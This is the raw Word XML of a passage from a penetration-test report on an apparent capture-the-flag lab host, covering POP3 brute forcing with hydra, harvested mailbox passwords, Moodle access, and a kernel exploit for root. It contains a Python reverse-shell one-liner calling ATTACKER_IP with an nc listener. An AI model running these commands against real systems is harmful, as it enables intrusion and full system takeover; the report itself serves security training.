            <wp:extent cx="4010830" cy="1955280"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
            <wp:docPr id="14435339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3393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830" cy="195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B9A61" w14:textId="3767CD92" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CE8063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t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>natalya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/share/wordlists/fasttrack.txt 192.168.56.101 -s 55007 pop3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202744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Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F1240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t xml:space="preserve">login: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>natalya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>password: bird</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC0415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 xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F56382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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF74FD0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lastRenderedPageBreak/>
        <w:t>Unauthorized mailbox access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDB362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pict w14:anchorId="3E08FE5E">
          <v:rect id="_x0000_i1171" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9781C1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4.3 Sensitive Information Disclosure (Email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859AA11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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE5007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t>Emails contained plaintext credentials and internal infrastructure details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C315E" w14:textId="1501F734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Evidence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60FF7B5B" wp14:editId="3A18089A">
            <wp:extent cx="4079793" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11783779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089" cy="1990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8"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B0EE24" w14:textId="6E6EBEC9" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FACAD80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t>username: xenia</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>password: RCP90rulez!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88D9D9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t xml:space="preserve">username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>dr_doak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>password: 4England!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A2536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Additional Leak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D12581F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t>severnaya-station.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gnocertdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13CB4607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 xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A26D3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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC053E7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t>Credential reuse and lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FAA73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pict w14:anchorId="7A134498">
          <v:rect id="_x0000_i1172" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="111AB5FA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4.4 Internal Web Application Access (Moodle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3F423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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F19D35" w14:textId="436AED33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lastRenderedPageBreak/>
        <w:t>Using harvested credentials, attacker gained access to internal training portal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7697A714" wp14:editId="0115BD9E">
            <wp:extent cx="4396740" cy="2143326"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="2157571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397" cy="2149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9C506" w14:textId="7A28C64E" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8836A4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URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A52C03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t>http://severnaya-station.com/gnocertdir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19964170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Compromised Account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34593111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t>xenia / RCP90rulez!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC28AC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 xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🟠</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397143F9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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49497A1A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t>Authenticated attack surface exposed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE1EB3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pict w14:anchorId="503B835D">
          <v:rect id="_x0000_i1173" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C780B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4.5 Remote Code Execution via Moodle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A60E9F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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8BAE51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t>The Moodle blog functionality allowed injection of malicious payloads leading to remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB6159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Exploit Vector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C259FE" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Blog post input field </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380323C4" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML/JS execution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FDC69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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337898E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t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>pty,socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>os;s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>);s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.connect(("ATTACKER_IP",9001)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>);os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(),0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>);os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(),1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>);os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.dup2(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(),2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>);pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4C529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lastRenderedPageBreak/>
        <w:t>Listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C6EB0" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F4A01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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1135D8" w14:textId="380A2F9A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t>Shell received as www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C3A2102" wp14:editId="593C8060">
            <wp:extent cx="3657745" cy="1783080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9649208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871" cy="1787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6C9B4" w14:textId="484BA3CB" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D4C0DB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 xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF74975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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9D44F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t>Full remote command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2CD7D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pict w14:anchorId="162B6247">
          <v:rect id="_x0000_i1174" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E812B9" w14:textId="6E4F505C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4.6 Privilege Escalation (Kernel Exploit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76BCC9E8" wp14:editId="45D00AD6">
            <wp:extent cx="3779520" cy="1842443"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="7634292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182" cy="1844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8"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E5D147F" wp14:editId="17CA4544">
            <wp:extent cx="4351020" cy="2121038"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13647001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170" cy="2128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ABEB2" w14:textId="1922FABB" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F218BE" w14:textId="22927E6B" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47ABECD1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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8E5D1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t>The system was running a vulnerable Linux kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F855F3D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Kernel Version:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA3789B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t>3.13.0-32-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C56BD27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Tool Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3821F" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3A9F7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Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125C463E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t>CVE-2015-1328 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>OverlayFS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF865F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Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD2E025" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDF28A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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E5ECA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t>root shell obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2707503D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 xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9DFA5E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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AC98E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t>Full system compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66332B85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pict w14:anchorId="1965E8F4">
          <v:rect id="_x0000_i1175" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54196C8D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lastRenderedPageBreak/>
        <w:t>5. Post-Exploitation Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6631E4" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Access to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory for staging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6194DB68" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ability to execute arbitrary binaries </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B20E0F" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Full control over system resources </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D210CC" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Potential persistence mechanisms available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB1030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pict w14:anchorId="75A6A417">
          <v:rect id="_x0000_i1176" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08F67A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6. Risk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  <w:gridCol w:w="1036"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="75F089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475AC" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"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188308AD" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
